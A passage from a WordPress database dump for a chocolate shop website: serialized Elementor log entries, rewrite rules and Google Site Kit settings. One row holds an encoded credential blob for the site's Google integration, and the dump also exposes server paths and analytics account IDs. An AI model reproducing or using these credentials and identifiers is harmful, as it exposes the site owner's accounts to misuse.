\";s:4:\"type\";s:4:\"info\";}}s:32:\"8c6d274f144208da0f1292f4115c1708\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-11-01 12:03:44\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:81:\"אלמנטור פרו/Upgrades - _v_2_5_4_form callback needs to run more 1 times\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-11-01 12:03:44\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:81:\"אלמנטור פרו/Upgrades - _v_2_5_4_form callback needs to run more 1 times\";s:4:\"type\";s:4:\"info\";}}s:32:\"2180f8644c55869226f35d511e8024e5\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-11-01 12:03:44\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:21:\"אלמנטור פרו\";s:4:\"from\";s:5:\"2.1.7\";s:2:\"to\";s:5:\"2.7.3\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-11-01 12:03:44\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:21:\"אלמנטור פרו\";s:4:\"from\";s:5:\"2.1.7\";s:2:\"to\";s:5:\"2.7.3\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"72ea313881154f5b973b98df0eb2bafb\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-11-01 12:03:44\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:55:\"אלמנטור פרו/Upgrades - _v_2_5_0_form Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-11-01 12:03:44\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:55:\"אלמנטור פרו/Upgrades - _v_2_5_0_form Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"de014cbbd6c7d3db4d104bc97e760e27\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-11-01 12:03:44\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:67:\"אלמנטור פרו/Upgrades - _v_2_5_4_form Start (2 of 2, 100%)\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-11-01 12:03:44\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:67:\"אלמנטור פרו/Upgrades - _v_2_5_4_form Start (2 of 2, 100%)\";s:4:\"type\";s:4:\"info\";}}s:32:\"eacd1af9d654bf470a3322d2e0cbaaa2\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-11-01 12:03:44\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:55:\"אלמנטור פרו/Upgrades - _v_2_5_4_form Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-11-01 12:03:44\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:55:\"אלמנטור פרו/Upgrades - _v_2_5_4_form Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"e06443ccf18e5c8b965ba4ddfd7e1e54\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-11-01 12:03:44\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:21:\"אלמנטור פרו\";s:4:\"from\";s:5:\"2.1.7\";s:2:\"to\";s:5:\"2.7.3\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-11-01 12:03:44\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:21:\"אלמנטור פרו\";s:4:\"from\";s:5:\"2.1.7\";s:2:\"to\";s:5:\"2.7.3\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"7bdb832eee776b35314f07404d69d8dd\";O:31:\"Elementor\\Core\\Logger\\Items\\PHP\":9:{s:7:\"\0*\0file\";s:116:\"/home/chocoded/domains/chocolate4u.co.il/public_html/wp-content/plugins/elementor-pro/modules/forms/widgets/form.php\";s:7:\"\0*\0line\";i:1302;s:7:\"\0*\0date\";s:19:\"2019-11-01 12:05:25\";s:7:\"\0*\0type\";s:6:\"notice\";s:10:\"\0*\0message\";s:28:\"Undefined index: button_icon\";s:7:\"\0*\0meta\";a:1:{s:5:\"trace\";a:1:{i:0;a:3:{s:8:\"function\";s:8:\"shutdown\";s:5:\"class\";s:29:\"Elementor\\Core\\Logger\\Manager\";s:4:\"type\";s:2:\"->\";}}}s:8:\"\0*\0times\";i:6564;s:14:\"\0*\0times_dates\";a:42:{i:0;s:19:\"2019-12-13 12:17:10\";i:1;s:19:\"2019-12-13 13:12:01\";i:2;s:19:\"2019-12-13 13:19:23\";i:3;s:19:\"2019-12-13 14:46:32\";i:4;s:19:\"2019-12-13 15:38:01\";i:5;s:19:\"2019-12-13 15:43:24\";i:6;s:19:\"2019-12-13 15:43:45\";i:7;s:19:\"2019-12-13 15:43:48\";i:8;s:19:\"2019-12-13 16:00:13\";i:9;s:19:\"2019-12-13 16:09:57\";i:10;s:19:\"2019-12-13 16:33:47\";i:11;s:19:\"2019-12-13 16:38:58\";i:12;s:19:\"2019-12-13 16:40:52\";i:13;s:19:\"2019-12-13 16:56:10\";i:14;s:19:\"2019-12-13 17:04:06\";i:15;s:19:\"2019-12-13 17:07:56\";i:16;s:19:\"2019-12-13 17:11:22\";i:17;s:19:\"2019-12-13 17:13:15\";i:18;s:19:\"2019-12-13 17:14:56\";i:19;s:19:\"2019-12-13 17:14:57\";i:20;s:19:\"2019-12-13 17:15:09\";i:21;s:19:\"2019-12-13 17:17:04\";i:22;s:19:\"2019-12-13 17:24:41\";i:23;s:19:\"2019-12-13 17:39:55\";i:24;s:19:\"2019-12-13 17:51:21\";i:25;s:19:\"2019-12-13 17:52:00\";i:26;s:19:\"2019-12-13 18:02:17\";i:27;s:19:\"2019-12-13 18:02:30\";i:28;s:19:\"2019-12-13 18:02:49\";i:29;s:19:\"2019-12-13 18:03:01\";i:30;s:19:\"2019-12-13 18:03:11\";i:31;s:19:\"2019-12-13 18:03:34\";i:32;s:19:\"2019-12-13 18:03:59\";i:33;s:19:\"2019-12-13 18:05:00\";i:34;s:19:\"2019-12-13 18:05:01\";i:35;s:19:\"2019-12-13 18:06:17\";i:36;s:19:\"2019-12-13 18:06:20\";i:37;s:19:\"2019-12-13 18:06:40\";i:38;s:19:\"2019-12-13 18:07:06\";i:39;s:19:\"2019-12-13 18:07:08\";i:40;s:19:\"2019-12-13 18:07:15\";i:41;s:19:\"2019-12-13 18:07:20\";}s:7:\"\0*\0args\";a:5:{s:4:\"type\";s:6:\"notice\";s:7:\"message\";s:28:\"Undefined index: button_icon\";s:4:\"file\";s:116:\"/home/chocoded/domains/chocolate4u.co.il/public_html/wp-content/plugins/elementor-pro/modules/forms/widgets/form.php\";s:4:\"line\";i:1302;s:5:\"trace\";b:1;}}s:32:\"6f1cbcc026fb9f7e9d90b59a8bb4e172\";O:30:\"Elementor\\Core\\Logger\\Items\\JS\":10:{s:9:\"\0*\0column\";s:5:\"39895\";s:7:\"\0*\0file\";s:100:\"https://www.chocolate4u.co.il/wp-content/plugins/elementor/assets/js/editor-modules.min.js?ver=2.7.5\";s:7:\"\0*\0line\";s:1:\"2\";s:7:\"\0*\0date\";s:19:\"2020-01-19 18:35:10\";s:7:\"\0*\0type\";s:5:\"error\";s:10:\"\0*\0message\";s:43:\"n.attributes[e.name].each is not a function\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:3;s:14:\"\0*\0times_dates\";a:3:{i:0;s:19:\"2020-01-19 18:35:10\";i:1;s:19:\"2020-01-19 18:35:12\";i:2;s:19:\"2020-01-19 18:35:13\";}s:7:\"\0*\0args\";a:6:{s:4:\"type\";s:5:\"error\";s:9:\"timestamp\";s:10:\"1579458910\";s:7:\"message\";s:43:\"n.attributes[e.name].each is not a function\";s:3:\"url\";s:100:\"https://www.chocolate4u.co.il/wp-content/plugins/elementor/assets/js/editor-modules.min.js?ver=2.7.5\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:5:\"39895\";}}s:32:\"02a6cbaeaee8b29d9dfae08dc7b81d53\";O:30:\"Elementor\\Core\\Logger\\Items\\JS\":10:{s:9:\"\0*\0column\";s:5:\"46150\";s:7:\"\0*\0file\";s:92:\"https://www.chocolate4u.co.il/wp-content/plugins/elementor/assets/js/editor.min.js?ver=2.7.5\";s:7:\"\0*\0line\";s:1:\"2\";s:7:\"\0*\0date\";s:19:\"2020-01-24 19:09:17\";s:7:\"\0*\0type\";s:5:\"error\";s:10:\"\0*\0message\";s:55:\"Cannot read property \\&#039;select2\\&#039; of undefined\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:8;s:14:\"\0*\0times_dates\";a:8:{i:0;s:19:\"2020-01-24 19:09:17\";i:1;s:19:\"2020-01-24 19:09:17\";i:2;s:19:\"2020-01-24 19:09:17\";i:3;s:19:\"2020-01-24 19:09:17\";i:4;s:19:\"2020-01-24 19:09:17\";i:5;s:19:\"2020-01-24 19:09:17\";i:6;s:19:\"2020-01-24 19:09:17\";i:7;s:19:\"2020-01-24 19:09:17\";}s:7:\"\0*\0args\";a:6:{s:4:\"type\";s:5:\"error\";s:9:\"timestamp\";s:10:\"1579892957\";s:7:\"message\";s:45:\"Cannot read property \\\'select2\\\' of undefined\";s:3:\"url\";s:92:\"https://www.chocolate4u.co.il/wp-content/plugins/elementor/assets/js/editor.min.js?ver=2.7.5\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:5:\"46150\";}}s:32:\"2f8b22503014336f8315fad251903af4\";O:30:\"Elementor\\Core\\Logger\\Items\\JS\":10:{s:9:\"\0*\0column\";s:5:\"43325\";s:7:\"\0*\0file\";s:92:\"https://www.chocolate4u.co.il/wp-content/plugins/elementor/assets/js/editor.min.js?ver=2.7.5\";s:7:\"\0*\0line\";s:1:\"7\";s:7:\"\0*\0date\";s:19:\"2020-02-02 17:43:19\";s:7:\"\0*\0type\";s:5:\"error\";s:10:\"\0*\0message\";s:32:\"elementorFrontend is not defined\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-02-02 17:43:19\";}s:7:\"\0*\0args\";a:6:{s:4:\"type\";s:5:\"error\";s:9:\"timestamp\";s:10:\"1580665399\";s:7:\"message\";s:32:\"elementorFrontend is not defined\";s:3:\"url\";s:92:\"https://www.chocolate4u.co.il/wp-content/plugins/elementor/assets/js/editor.min.js?ver=2.7.5\";s:4:\"line\";s:1:\"7\";s:6:\"column\";s:5:\"43325\";}}s:32:\"a8cf656e969962e84b9544b50c4ad492\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-05-14 11:46:43\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:36:\"elementor::elementor_updater Started\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-05-14 11:46:43\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:36:\"elementor::elementor_updater Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"ad0d57120b9dfbcd8865292f3e24f893\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-05-14 11:46:43\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:59:\"אלמנטור/Upgrades - _v_2_8_3_recalc_usage_data Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-05-14 11:46:43\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:59:\"אלמנטור/Upgrades - _v_2_8_3_recalc_usage_data Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"847bc28fd8b78e41acbd13cb3a7dea0a\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-05-14 11:46:43\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:14:\"אלמנטור\";s:4:\"from\";s:5:\"2.7.5\";s:2:\"to\";s:5:\"2.9.8\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-05-14 11:46:43\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:14:\"אלמנטור\";s:4:\"from\";s:5:\"2.7.5\";s:2:\"to\";s:5:\"2.9.8\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"76692842c6785d5064028c9a22667a9d\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-05-14 11:46:44\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:61:\"אלמנטור/Upgrades - _v_2_8_3_recalc_usage_data Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-05-14 11:46:44\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:61:\"אלמנטור/Upgrades - _v_2_8_3_recalc_usage_data Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"3699dbb10ef74ac3f0643a2d26ba77fe\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-05-14 11:46:44\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:14:\"אלמנטור\";s:4:\"from\";s:5:\"2.7.5\";s:2:\"to\";s:5:\"2.9.8\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-05-14 11:46:44\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:14:\"אלמנטור\";s:4:\"from\";s:5:\"2.7.5\";s:2:\"to\";s:5:\"2.9.8\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"420b409bfbc750904387220c4d0bafd9\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-05-14 11:54:43\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:21:\"אלמנטור פרו\";s:4:\"from\";s:5:\"2.7.3\";s:2:\"to\";s:5:\"2.9.4\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-05-14 11:54:43\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:21:\"אלמנטור פרו\";s:4:\"from\";s:5:\"2.7.3\";s:2:\"to\";s:5:\"2.9.4\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}}','no'),(10890,'elementor_library_category_children','a:0:{}','yes'),(14973,'wp_page_for_privacy_policy','0','yes'),(14974,'show_comments_cookies_opt_in','1','yes'),(14975,'db_upgraded','','yes'),(14984,'can_compress_scripts','0','no'),(23660,'rewrite_rules','a:90:{s:19:\"sitemap_index\\.xml$\";s:19:\"index.php?sitemap=1\";s:31:\"([^/]+?)-sitemap([0-9]+)?\\.xml$\";s:51:\"index.php?sitemap=$matches[1]&sitemap_n=$matches[2]\";s:24:\"([a-z]+)?-?sitemap\\.xsl$\";s:39:\"index.php?yoast-sitemap-xsl=$matches[1]\";s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:39:\"amn_mi-lite/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:49:\"amn_mi-lite/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:69:\"amn_mi-lite/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:64:\"amn_mi-lite/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:64:\"amn_mi-lite/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:32:\"amn_mi-lite/([^/]+)/trackback/?$\";s:38:\"index.php?amn_mi-lite=$matches[1]&tb=1\";s:40:\"amn_mi-lite/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?amn_mi-lite=$matches[1]&paged=$matches[2]\";s:47:\"amn_mi-lite/([^/]+)/comment-page-([0-9]{1,})/?$\";s:51:\"index.php?amn_mi-lite=$matches[1]&cpage=$matches[2]\";s:36:\"amn_mi-lite/([^/]+)(?:/([0-9]+))?/?$\";s:50:\"index.php?amn_mi-lite=$matches[1]&page=$matches[2]\";s:28:\"amn_mi-lite/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:38:\"amn_mi-lite/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:58:\"amn_mi-lite/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:53:\"amn_mi-lite/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:53:\"amn_mi-lite/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:38:\"index.php?&page_id=7&cpage=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:40:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:35:\"([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:24:\"([^/]+)(?:/([0-9]+))?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:46:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";}','yes'),(23668,'elementor_load_fa4_shim','yes','yes'),(23703,'googlesitekit_new_site_posts','-1','no'),(23704,'googlesitekit_db_version','1.8.1','yes'),(23706,'googlesitekit_credentials','rV0Jg4DSMMDxWXop5xJd/XQ3OXV1eEZrVjVVRGp2TzJDY3h2cUxSVHRKSElTUXNtcEZtN05YQnNzYkFsRjVrdjR0dThGdkpYSGpoYTJrVUFNekNBNlM0bTVTTjBKNzgza2dUSEFKV1FxVDIwWXIydWxVZmFsY2FoVkhUc1dtQWpiMURpbE9yU21nUVBRdHJEWXlVOVQ2R3ZsamVmWXNqMjJOaGs3Z2tZOExxajdVQVBzYWIzNzRqQ29SSUtzRFBpbVd6Nm9iSk5MdWpNTXpTRzh0cUVUZ1RCd3psOFJpQ242dGFjeFBoRjlZeWZPNnoydzJLdzMwc3JOZndzYjczaXp0eHBHU3BTQ3E1OHJ3VU5SU1kxSzFQa0VQWW1YWERMWk9sMkNLY2MrdGM1eDBTSXFraHBTSEMyZENucnlmdE00clZLTk1ybHd3PT0=','yes'),(23707,'googlesitekit_search_console_property','https://www.chocolate4u.co.il/','yes'),(23708,'googlesitekit_first_admin','1','yes'),(23709,'googlesitekit-active-modules','a:2:{i:0;s:9:\"analytics\";i:1;s:18:\"pagespeed-insights\";}','yes'),(23710,'elementor_custom_icon_sets_config','a:0:{}','yes'),(23714,'_transient_googlesitekit_verification_meta_tags','a:0:{}','yes'),(23715,'googlesitekit_analytics_settings','a:6:{s:9:\"accountID\";s:9:\"119774396\";s:10:\"propertyID\";s:14:\"UA-119774396-1\";s:21:\"internalWebPropertyID\";s:9:\"177155546\"